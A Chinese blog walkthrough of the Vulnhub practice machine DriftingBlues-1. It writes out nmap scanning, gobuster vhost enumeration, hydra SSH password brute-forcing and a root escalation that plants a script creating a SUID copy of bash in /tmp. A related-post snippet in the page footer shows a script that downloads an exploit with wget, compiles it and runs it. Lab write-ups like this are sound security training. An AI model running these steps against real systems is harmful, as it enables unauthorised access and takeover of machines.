靶机渗透练习Vulnhub DriftingBlues-1

已于 2022-09-03 15:14:49 修改
阅读量900 收藏
点赞数
文章标签: 安全 linux ssh web安全
于 2022-09-03 15:11:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/126677594
版权

靶机下载地址:

DriftingBlues: 1 ~ VulnHub

然后用虚拟机打开,网络设置为NAT模式

1、扫描局域网内的C段主机(主机发现)

输入命令:

nmap -sP 192.168.159.1/24

成功发现靶机ip

192.168.159.143

2、扫描端口获得运行的服务

nmap

nmap -p 1-65535 -A 192.168.159.143

 发现开启了22端口和80端口

访问 :

192.168.159.143

在网页源码里面发现base64编码

 解码后得到提示

 

/noteforkingfish.txt

访问

192.168.159.143/noteforkingfish.txt

得到ok密码

brainfuck(+.>),ok!解码(ok!) :

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

 解码后得到

my man, i know you are new but you should know how to use host file to reach our secret location. -eric

让我们使用主机文件去达到秘密的位置

 提示是修改主机文件中的/etc/hosts

 根据提示修改本地host文件

命令:

vim /etc/hosts

192.168.159.143 driftingblues.box

 

3.目录爆破

需要使用一款目录暴力工具Gobuster 

安装:

apt-get install gobuster

使用命令:

gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

 找到两个状态码为200的目录

修改/etc/hosts,把之前那个修改为这个

命令:

vim /etc/hosts

192.168.159.143 test.driftingblues.box

 访问

http://test.driftingblues.box/

得到

work in progress -eric

用dirb进行目录扫描

dirb http://test.driftingblues.box

访问

http://test.driftingblues.box/robots.txt

再访问

http://test.driftingblues.box/ssh_cred.txt

 得到

we can use ssh password in case of emergency. it was "1mw4ckyyucky". sheryl once told me that she added a number to the end of the password. -db

提示表明密码是1mw4ckyyucky?最后一个是一个数字

密码可以自己从0-9一个个试也可以用hydra爆破

简单制作一个密码字典

 hydra

用hydra爆破

hydra -l 用户名 -P 密码字典 -v ip ssh

hydra -l eric -P DriftingBlues1.txt -v 192.168.159.143 ssh

得到密码为

1mw4ckyyucky6

 ssh

使用ssh连接

ssh 用户名@ip

ssh eric@192.168.159.143

成功进入

4.提权

在目录下发现了user.txt打开后发现flag1

 在var/backups下发现了备份脚本文件backup.sh

发现sudo执行/tmp/emergency文件

查看tmp发现tmp下没有emergency文件

所以我们需要创建 并将eric用户加入sudo组

命令:

echo 'cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot' > /tmp/emergency
chmod +x emergency
 ./getroot -p

cp /bin/bash /tmp/getroot就是复制 /bin/bash 到 /tmp/getroot下,chmod +s 就是给某个程序或者教本以suid权限

再使用chmod命令给emergency可执行权限

chmod +x emergency

执行文件

./getroot -p

等待backup.sh文件执行,sudo命令执行emergency,生成getroot文件,具有suid权限,然后执行文件./getroot -p就可以获得root权限

成功得到flag2

参考文献 :

http://t.csdn.cn/1FvyF
http://t.csdn.cn/ef0im
http://t.csdn.cn/OQ6f6
http://t.csdn.cn/w2eJt

墨言ink
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
靶机18 driftingblues1
honest_gg的博客
10-31 1190
获取标志 难度:简单
drippingblues-靶机渗透
weixin_52111404的博客
08-26 588
渗透,文件包含,使用cve提权,使用正在运行进程的漏洞进行提权
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-1
Aluxian_的博客
06-02 1151
Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。 Vulnhub靶机下载: 官网地址: https://w
靶机渗透练习01-driftingblues1
Force~
03-24 1728
靶机地址: https://www.vulnhub.com/entry/driftingblues-1,625/ ###1、主机探活 arp-scan -I eth0 -l (指定网卡扫) masscan 192.168.184.0/24 -p 80,22 netdiscover -i eth0 -r 192.168.184.0/24 ###2、端口扫描 nmap -A -sV -T4 -p- 192.168.111.8 ###3、访问80端口,遇事不决,目录扫描来一波 gobuster .
靶机渗透练习01-driftingblues
hirak0的博客
04-13 1278
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-1,625/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshoo
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub靶机DriftingBlues: 1渗透笔记
liver100day的博客
07-24 1616
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.4 访问80端口(http服务)1.3 目录爆破2.漏洞利用(暴力破解)3.提权4.总结 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-1,625/ 渗透过程 1.信息收集 1.1 主机发现 首先我们先得获取目标靶机IP,没有IP我们无从开始工作,使用nmap进行扫
linux权限溢出,linux本地自动溢出获取root权限工具
weixin_29928877的博客
05-01 223
脚本内容如下:#!/usr/bin/perl# linux本地自动溢出获取root权限工具# chmod 777 getroot.pl# ./getroot.pl{system("wget -O 15704 http://www.exploit-db.com/download/15704");system("gcc -w 15704.c -o 15704");system("chmod 777 1...
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 332
亚信安全发布2024年6月威胁态势
构建安全稳定的应用:SpringSecurity实用指南
zhugedali_的博客
07-04 690
它涵盖了认证(Authentication)、授权(Authorization)、防止常见的安全攻击等多个方面,适用于各种类型的应用,包括 Web 应用、RESTful 服务、微服务等。- 生成认证对象:认证成功后,创建包含用户信息、角色和权限的 Authentication 对象,并存储在安全上下文中。- 加载用户角色和权限:除了基本的用户信息,还包括用户所拥有的角色和权限。- 认证请求处理:根据配置的认证方式,对用户提交的认证信息进行验证。
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1191
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 896
然后这一步,你看,这里有个决策点
[终端安全]-5 移动终端之操作系统安全
最新发布
wendywm0496的博客
07-08 659
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
[图解]SysML和EA建模住宅安全系统-11-接口块
rolt的专栏
07-06 926
当然内部块图里面肯定要比这个丰富
谷歌正在试行人脸识别办公室安全系统
网络研究观
07-04 1187
谷歌正在测试面部识别技术用于办公室安全,以帮助防止未经授权的个人进入园区。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值